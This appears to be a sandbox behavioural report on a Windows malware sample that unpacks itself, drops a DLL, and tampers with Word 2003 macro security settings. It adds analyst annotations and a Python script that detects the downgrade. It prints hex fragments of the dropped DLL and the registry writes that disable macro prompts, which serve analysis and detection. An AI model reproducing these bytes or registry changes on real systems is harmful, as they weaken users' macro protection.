C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 AA BF 5B 1E C6 BA A6 BF 45 90 AB B0 F8 B4 B8 C4 C2 CB 2F 6E FC 95 89 D2 2A FE CE C9 95 D5 DC A1 D8 91 29 6B E9 DD D4 D0 30 E0 84 DD 91 CC DD B6 85 DD 39 30 B6 D2 D6 BF 88 6E ED F7 AB 5D 1B F2 9B 89 28 7B A8 CE C7 DD 45 FE 3D DC 82 83 D6 C4 00 90 40 00 00 00 00 00 00 00 00 00 00 00 00 00 04 70 00 10 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 4F 68 7A 67 6E 00 59 45 45 59 63 75 6E 6F 71 6A 77 00 44 66 67 67 75 76 56 48 52 50 00 74 79 6F 71 75 62 00 47 68 67 6E 63 75 65 20 4C 78 71 67 76 6B 72 6E 20 77 79 6E 73 75 61 00 25 76 20 4F 6D 64 20 22 25 75 22 28 45 79 42 64 6F 20 77 20 43 55 20 56 74 78 6C 71 6B 29 20 43 75 20 4F 6F 74 6A 0D success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 00 00 00 36 3F 91 4C 00 00 00 00 6E 90 00 00 01 00 00 00 07 00 00 00 07 00 00 00 28 90 00 00 44 90 00 00 60 90 00 00 9C 10 00 00 E0 10 00 00 E8 10 00 00 F4 15 00 00 0C 16 00 00 D8 16 00 00 70 15 00 00 78 90 00 00 80 90 00 00 8A 90 00 00 95 90 00 00 9C 90 00 00 A3 90 00 00 AA 90 00 00 00 00 01 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 10 00 00 A8 00 00 00 3A 30 53 30 5E 30 75 30 92 30 A9 30 BF 30 FA 30 16 31 40 31 46 31 75 31 87 31 93 31 99 31 C3 31 D0 31 DE 31 E4 31 08 32 0E 32 2F 32 51 32 69 32 72 32 BB 32 E3 32 37 33 5C 33 78 33 8A 33 E4 33 1A 34 38 34 43 34 98 34 AD 34 D7 34 EC 34 F8 34 06 35 93 35 AA 35 B1 35 C0 35 C6 35 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 0 unknown success or wait 1 4018C9 WriteFile
File Path Offset Length Value Completion Count Source Address Symbol
  (no further entries)
File Path Disposition Data Ascii Data Completion Count Source Address Symbol
  (no entries)

Section Activities

Reading the tables below: rows with 40xxxx source addresses are the sample's own .text; rows with 35xxxx source addresses (msvcrt, NlsSectionCType) run from the execute-and-write region allocated at 350000 under Memory Activities, i.e. unpacked code. The sample maps C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp first as a committed execute section at 3A0000 and then as an image at 10000000 (size 49152), so the dropped file is loaded in-process as a DLL at its preferred base, and every later row with a 1000xxxx source address (user32, GDI32, imm32, ws2_32, ws2help, iphlpapi, ole32, oleaut32) is that DLL pulling in its own dependencies, the Winsock and IP-helper libraries included.

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit AF0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit AF0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown AF0000 262144 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit B30000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image B30000 2904064 own pid read write conflicting addresses 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute and extend size commit 3F0000 24576 own pid readonly success or wait 1
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1 40111F
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1 40111F
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1 40111F
unknown query and write and read commit 400000 0 own pid execute and read and write access denied 1 351410
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1 351471
\NLS\NlsSectionCType read unknown 390000 12288 own pid readonly success or wait 1 351471
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp write and read and execute commit 3A0000 24576 own pid execute success or wait 1 401949
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute image 10000000 49152 own pid read write success or wait 1 401949
\KnownDlls\user32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1 100043DD
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3A0000 110592 own pid execute success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3A0000 110592 own pid execute success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1 100043DD
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 100043DD
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 100043DD
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1 100043DD
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1 100043DD
\KnownDlls\oleaut32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 100043DD

Registry Activities

Keys created
  Key Path | Completion | Count | Source Address | Symbol
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | success or wait | 1 | 10003C9C | RegCreateKeyExA

Values set
  Key Path | Name | Type | Data | Completion | Count | Source Address | Symbol
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | Level | dword | 1 | success or wait | 1 | 10003DA8 | RegSetValueExA
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | AccessVBOM | dword | 1 | success or wait | 1 | 10003E06 | RegSetValueExA

Values changed
  Key Path | Name | Type | Old Data | New Data | Completion | Count | Source Address | Symbol
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | Level | dword | 1 | 4 | success or wait | 1 | 10003DA8 | RegSetValueExA
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | AccessVBOM | dword | 1 | 0 | success or wait | 1 | 10003E06 | RegSetValueExA

Values queried
  Key Path | Name | Completion | Count | Source Address | Symbol
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | Level | object name not found | 1 | 10003D03 | RegQueryValueExA
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | AccessVBOM | object name not found | 1 | 10003D64 | RegQueryValueExA
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | Level | success or wait | 1 | 10003D03 | RegQueryValueExA
  HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security | AccessVBOM | success or wait | 1 | 10003D64 | RegQueryValueExA
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | Shell | success or wait | 1 | 1000290D | RegQueryValueExA

  All of this runs from the dropped DLL (1000xxxx source addresses). It creates Word's Security key, finds that neither value exists ("object name not found"), sets Level=1 (Low: Word 2003 runs macros without prompting) and AccessVBOM=1 (trusted access to the VBA project object model), and later writes Level=4 (Very High) and AccessVBOM=0. Because the values did not exist before, the second write is not a restore of the user's settings: a Word that previously followed defaults is left pinned to Very High with VBOM access denied. The key path is printed as the sandbox shows it, without the user SID under HKEY_USERS. Winlogon\Shell is a value commonly used for persistence; only a read of it is recorded here.
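Added example (not part of the sandbox output): detection logic for the pattern in the Registry Activities tables, in Python over a constructed event list. The events are transcribed from the tables above; because the report lists them by table rather than by time, the ordering (query, not found; set; query, found; set again) is an assumption of this example that is consistent with the Old Data / New Data rows. The check flags any write that weakens Word 2003 macro security or opens VBOM access, and separately flags the "set weak, then set back" sequence, which is worth its own alert because the final registry state looks harmless.

```python
from collections import OrderedDict

# Word 2003 (Office 11.0) macro security levels stored in ...\Word\Security\Level.
LEVEL_NAMES = {1: "Low", 2: "Medium", 3: "High", 4: "Very High"}

KEY = r"HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security"
WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# (api, key, value name, data, status), transcribed from the report's tables.
# The ordering is this example's assumption, consistent with Old Data / New Data.
EVENTS = [
    ("RegCreateKeyExA",  KEY, None,         None, "success or wait"),
    ("RegQueryValueExA", KEY, "Level",      None, "object name not found"),
    ("RegQueryValueExA", KEY, "AccessVBOM", None, "object name not found"),
    ("RegSetValueExA",   KEY, "Level",      1,    "success or wait"),
    ("RegSetValueExA",   KEY, "AccessVBOM", 1,    "success or wait"),
    ("RegQueryValueExA", KEY, "Level",      None, "success or wait"),
    ("RegQueryValueExA", KEY, "AccessVBOM", None, "success or wait"),
    ("RegSetValueExA",   KEY, "Level",      4,    "success or wait"),
    ("RegSetValueExA",   KEY, "AccessVBOM", 0,    "success or wait"),
    ("RegQueryValueExA", WINLOGON, "Shell", None, "success or wait"),
]


def weak_setting(name, data) -> bool:
    """True when the value lets a document run macros or touch the VBA project without a prompt."""
    if name == "Level":
        return data is not None and data <= 2
    if name == "AccessVBOM":
        return data == 1
    return False


def describe(name, data) -> str:
    if name == "Level":
        return f"Level={data} ({LEVEL_NAMES.get(data, 'unknown')})"
    return f"{name}={data}"


def office_security_findings(events) -> dict:
    """
    For each value written under an Office ...\Security key: its write history,
    whether the value existed before, and whether a weak setting was later reverted.
    """
    history = OrderedDict()
    absent_before = set()
    for api, key, name, data, status in events:
        if not key.endswith(r"\Security"):
            continue
        if api == "RegQueryValueExA" and status == "object name not found":
            absent_before.add((key, name))
        if api == "RegSetValueExA" and status.startswith("success"):
            history.setdefault((key, name), []).append(data)

    findings = {}
    for (key, name), writes in history.items():
        weak = [i for i, d in enumerate(writes) if weak_setting(name, d)]
        if not weak:
            continue
        reverted = any(not weak_setting(name, d) for d in writes[weak[0] + 1:])
        findings[name] = {
            "key": key,
            "writes": [describe(name, d) for d in writes],
            "did_not_exist_before": (key, name) in absent_before,
            "transient_downgrade": reverted,
            "final": describe(name, writes[-1]),
        }
    return findings


if __name__ == "__main__":
    for name, finding in office_security_findings(EVENTS).items():
        print(name, finding)
```

A monitor that only compares before/after snapshots of the key would see "Level=4, AccessVBOM=0" and nothing wrong; the per-write history is what exposes the window in which macros ran unprompted.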

Mutex Activities

Name Completion Count Source Address Symbol
  (no entries)

Process Activities

PID Process info class Completion Count Source Address Symbol
  (no entries)

Processes terminated
  PID | Filepath | Completion | Count | Source Address | Symbol
  1764 | C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe | success or wait | 1 | 401A10 | ExitProcess

Thread Activities

Threads created
  TID | PID | EIP | EAX (Usermode EIP) | Filepath | Completion | Count | Source Address | Symbol
  712 | 1764 | 7C8106F9 | 40145C | C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe | success or wait | 1 | 401378 | CreateThread

TID PID Path Completion Count Source Address Symbol
  (no entries)

Thread delays
  TID | Delay | Completion | Count | Source Address | Symbol
  712 | -5s | success or wait | 1 | 1000401B | Sleep

Memory Activities

Memory allocated
  PID | Filepath | Base | Length | Protection | Completion | Count | Source Address | Symbol
  1764 | C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe | 340000 | 12FEF0 | page read and write | success or wait | 1 | 4018D0 | VirtualAlloc
  1764 | C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe | 350000 | 12FED0 | page execute and read and write | success or wait | 1 | 401928 | VirtualAlloc
  1764 | C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe | 370000 | 12FE04 | page execute and read and write | success or wait | 1 | 3512FB | VirtualAlloc
  1764 | C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe | 400000 | 12FE04 | page execute and read and write | success or wait | 1 | 351796 | VirtualAlloc

  The first two allocations are made by the sample's .text (4018D0, 401928); the next two are made from 3512FB and 351796, i.e. from inside the execute-and-write block just allocated at 350000. That is the unpacking hand-off: the stub fills 350000 and transfers control there, and the unpacked code then allocates over its own image base (400000).

PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
  (no entries)

Memory usage
  Time | Private Usage (MB) | Working set (MB) | Page File Usage (MB)
  09:39:48 | 0 | 1 | 0
  09:39:50 | 0 | 1 | 0
  09:39:52 | 0 | 1 | 0
  09:39:54 | 0 | 2 | 0
  09:39:56 | 0 | 2 | 0
  09:39:59 | 0 | 2 | 0
  09:40:01 | 0 | 2 | 0
  09:40:46 | 0 | 2 | 0
  09:40:50 | 0 | 3 | 0
  09:40:53 | 0 | 3 | 0
  09:41:41 | 0 | 3 | 0
  09:41:48 | 0 | 3 | 0
  09:41:59 | 0 | 3 | 0
  09:42:03 | 0 | 3 | 0

System Activities

System info class Completion Count Source Address Symbol
  (no entries)

Timing Activities

Time Completion Count Source Address Symbol
  (no entries)

Windows UI Activities

Window name Class name HWND Completion Count Source Address Symbol
  (no entries)
HWND Completion Count Source Address Symbol
  (no entries)

Windows enumerated
  Desktop HWND | Parent HWND | Enum Children | TID | Window Handles | Completion | Count | Source Address | Symbol
  0 | 0 | false | 2C8 | 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E | success or wait | 2 | 10003F5B | CoUninitialize

  The "window handles" are not handles: read as little-endian UTF-16 pairs, 57005C 4E0049 4F0044 530057 73005C 730079 650074 33006D 5C0032 700078 700073 720032 730065 64002E spells "\WINDOWS\system32\xpsp2res.d", the path of the xpsp2res.dll image that Section Activities shows being loaded. The hook has logged a string buffer, so this row is an artefact of the monitoring, not evidence of window enumeration by the sample.

HWND Message LParam WParam Completion Count Source Address Symbol
  (no entries)
TID Message LParam WParam Completion Count Source Address Symbol
  (no entries)
Module Thread id Hook code Completion Count Source Address Symbol
  (no entries)
Chronological Activities
Operation Data Completion Time
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 2C8 HWNDs: 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E success or wait 1022159870
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 2C8 HWNDs: 1, 57005C, 4E0049, 4F0044, 530057, 73005C, 730079, 650074, 33006D, 5C0032, 700078, 700073, 720032, 730065, 64002E success or wait 1022271449
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file and open reparse point Attributes: none Content Overwritten: true success or wait 1023726630
File opened Path: C:\WINDOWS\system32\hyli.igo Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true success or wait 1023727864
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Name: Shell success or wait 1024171676
Process terminated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 1024305403
Section loaded Path: \KnownDlls\advapi32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 530438197
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 530442130
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 530447041
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 340000 Length: 12FEF0 Allocation Type: unknown Protection: page read and write success or wait 530456920
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 350000 Length: 12FED0 Allocation Type: unknown Protection: page execute and read and write success or wait 530459416
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 370000 Length: 12FE04 Allocation Type: unknown Protection: page execute and read and write success or wait 530464890
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 400000 Size: 0 Protection: execute and read and write Mapped to pid: own pid access denied 530466583
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 530467125
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 390000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 530474103
Memory allocated PID: 1764 Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe Base: 400000 Length: 12FE04 Allocation Type: unknown Protection: page execute and read and write success or wait 530478861
Thread created PID: 1764 TID: 712 EIP: 7C8106F9 EAX: 40145C Imagepath: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe success or wait 530486659
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: null success or wait 531483016
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 531939927
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 532174228
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 55 89 E5 53 83 EC 44 C6 45 F5 25 C6 45 F6 78 C6 45 F3 25 C6 45 F4 75 C6 45 F7 00 C7 44 24 0C F4 92 2B CB C7 44 24 08 F4 92 2B CB 8D 45 F3 89 44 24 04 8D 5D D3 89 1C 24 FF 15 8C 82 00 10 89 5C 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 FF 15 2C 82 00 10 83 EC 0C 89 C3 FF 15 7C 82 00 10 3D B7 success or wait 532269878
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: C7 04 24 0E 00 00 00 E8 50 21 00 00 84 C0 75 08 8D 65 F4 5B 5E 5F C9 C3 8B 1D EC 82 00 10 09 F3 8D BD A0 FD FF FF 89 7C 24 04 C7 04 24 0C 00 00 00 E8 4A 35 00 00 8B 15 8C 82 00 10 89 95 90 FD FF FF A1 EC 82 00 10 B1 64 D3 F8 89 FA 29 C2 89 D0 83 C0 64 89 44 24 04 C7 04 24 0B 00 00 00 E8 1C 35 00 00 success or wait 532280577
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: E4 00 00 00 80 BD 87 EB FF FF 00 0F 84 C3 00 00 00 85 C0 7E 42 31 F6 EB 28 8D 76 00 A1 EC 82 00 10 B1 E8 D3 F8 89 DA 29 C2 01 D6 C7 04 24 E8 03 00 00 FF 15 80 82 00 10 51 39 B5 B4 EB FF FF 7E 16 E8 EE 17 00 00 83 F8 02 75 D1 A1 EC 82 00 10 8D 3C 85 02 00 00 00 83 FF 02 0F 84 AA 00 00 00 C7 04 24 01 success or wait 532290026
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: B5 F0 FC FF FF B1 96 F3 A5 89 04 24 FF 15 6C 82 00 10 50 8D 85 48 FF FF FF 89 44 24 04 C7 04 24 00 00 00 00 E8 57 2D 00 00 8D 55 C8 89 54 24 08 C7 44 24 04 04 00 00 00 89 04 24 E8 BC FD FF FF C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 45 D8 00 00 00 00 C7 45 DC 00 00 00 00 8B 85 E0 FC FF FF 89 44 success or wait 532375958
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 74 3A 39 F2 77 22 8D 41 04 8D 76 00 39 C2 76 0E 89 C1 80 39 3A 74 D1 8D 41 01 39 C2 77 F2 31 C0 5B 5E 5F C9 C3 8D 76 00 89 F0 66 90 40 80 38 2F 74 0C 39 C2 77 F6 8D 46 01 EB D1 90 89 F0 39 C2 76 F4 C6 00 00 8D 78 01 8A 40 01 3C 0D 74 21 3C 0A 74 1D 39 FA 76 DF 89 F9 8D 76 00 41 8A 01 3C 0D 74 0F 3C success or wait 532385124
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 89 04 24 FF 15 A8 82 00 10 83 EC 10 85 C0 74 66 01 C3 85 DB 7F 9A EB C9 84 C9 74 AD 89 F2 84 D2 75 07 BE 01 00 00 00 EB A0 47 74 B0 8D 45 E4 89 44 24 08 89 7C 24 04 8D 95 E0 F7 FF FF 89 14 24 E8 8B FB FF FF 85 C0 0F 85 3B 01 00 00 80 3F 3C 74 24 8B 55 14 C6 02 00 8D 85 E0 F7 FF FF 89 44 24 04 C7 04 success or wait 532392018
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 5C 24 04 89 04 24 FF 15 C0 82 00 10 83 EC 24 8B 45 F4 8B 5D FC C9 C3 90 55 89 E5 57 56 53 81 EC AC 00 00 00 8B 75 0C 8B 7D 10 8B 45 08 89 04 24 E8 5B FF FF FF 89 C3 85 C0 74 61 85 FF 74 14 8D 85 68 FF FF FF 89 44 24 04 89 3C 24 E8 8B 1F 00 00 89 C6 8B 45 1C 89 44 24 14 8B 45 18 89 44 24 10 8B 45 14 success or wait 532488639
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 24 FF 15 A8 82 00 10 83 EC 10 89 85 E4 F7 FF FF C6 84 05 E8 F7 FF FF 00 85 C0 7E 36 89 C2 4A 31 FF 31 F6 8D 85 E8 F7 FF FF 89 D9 89 F3 89 CE EB 12 8D 76 00 80 F9 0A 74 43 31 FF 31 DB 85 D2 74 0F 40 4A 8A 08 80 F9 0D 75 EA B3 01 85 D2 75 F1 89 F3 8B 55 08 C7 82 4C 09 00 00 00 00 00 00 89 1C 24 FF 15 success or wait 532495722
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 00 C7 44 24 14 04 00 00 00 8D 55 08 89 54 24 10 C7 44 24 0C 04 00 00 00 89 5C 24 08 C7 44 24 04 00 00 00 00 89 04 24 E8 EC F7 FF FF 83 C4 24 5B C9 C3 66 90 55 89 E5 53 83 EC 34 C7 45 F4 00 00 00 00 C7 04 24 14 00 00 00 E8 66 17 00 00 89 C3 C7 04 24 12 00 00 00 E8 58 17 00 00 C7 44 24 14 04 00 00 00 success or wait 532504187
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 10 75 E6 8B 45 08 C7 80 24 08 00 00 01 00 00 00 C7 80 48 08 00 00 00 00 00 00 C7 44 24 04 10 50 00 10 83 C0 14 89 04 24 FF 15 EC 81 00 10 83 EC 08 8B 55 08 80 7A 05 00 75 48 8B 82 24 08 00 00 EB 20 66 90 8B 5D 08 8B 83 24 08 00 00 89 C2 C1 E2 07 01 C2 80 7C 13 14 00 74 27 40 89 83 24 08 00 00 89 44 success or wait 532603291
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 8B 55 0C 89 54 24 04 89 04 24 FF 15 FC 81 00 10 83 EC 08 85 C0 0F 94 C0 8D 65 F8 5E 5F C9 C3 90 55 89 E5 57 56 53 83 EC 6C 8B 55 0C 80 3A 3A 74 1F 3B 55 10 73 10 89 D6 8B 45 10 90 46 80 3E 3A 74 10 39 F0 77 F6 83 C4 6C 5B 5E 5F C9 C3 66 90 89 D6 39 75 10 76 EF A1 20 80 00 10 85 C0 74 E6 89 F7 29 D7 success or wait 532612561
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: E8 7B 0D 00 00 89 44 24 04 89 34 24 FF 95 64 FE FF FF 83 EC 08 8A 03 84 C0 0F 84 91 00 00 00 31 C9 8D 76 00 8D 50 D0 80 FA 09 77 0A 8D 14 89 0F BE C0 8D 4C 50 D0 43 8A 03 84 C0 75 E7 83 F9 77 7E 6E 8D 5D B0 89 5C 24 04 C7 04 24 1A 00 00 00 E8 2B 0D 00 00 8D 45 E0 89 44 24 20 8D 45 E4 89 44 24 1C C7 success or wait 532620465
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 51 04 00 00 A1 E0 81 00 10 E8 7A FA FF FF C7 04 24 88 13 00 00 FF 15 80 82 00 10 51 8D 4D E0 8D 55 E4 89 F8 E8 47 FB FF FF E9 19 FF FF FF 66 90 8D 45 A0 89 44 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 B9 01 00 00 00 BA 0E 00 00 00 8B 45 A8 E8 30 FA FF FF 85 C0 0F 85 6B FF FF FF 8B 45 A8 85 success or wait 532712117
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 89 7C 24 0C C7 44 24 08 00 00 00 00 8B 85 64 FF FF FF 89 44 24 04 8B 02 89 04 24 89 95 5C FF FF FF E8 96 00 00 00 89 03 89 7C 24 04 8B 85 64 FF FF FF 89 04 24 E8 8A 05 00 00 83 EC 08 89 03 83 C3 04 8B 95 5C FF FF FF 83 C2 04 46 8B 85 60 FF FF FF 39 34 C5 20 52 00 10 7F A5 89 D6 FF 85 60 FF FF FF 83 success or wait 532723028
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp Offset: unknown Length: 1024 Value: 84 C0 0F 84 70 01 00 00 8B 7D 0C C7 45 E8 00 00 00 00 66 90 FF 45 08 85 DB 0F 84 45 01 00 00 B8 61 00 00 00 31 D2 F7 75 EC 38 45 F3 0F 8D B6 00 00 00 66 90 B8 41 00 00 00 88 D9 D3 E8 38 45 F3 0F 8C CA 00 00 00 80 7D F3 5A 0F 8F C0 00 00 00 89 D8 B1 5A D3 E0 8D 48 5A 88 4D E7 BA 41 00 00 00 BE 41 00 success or wait 532729319
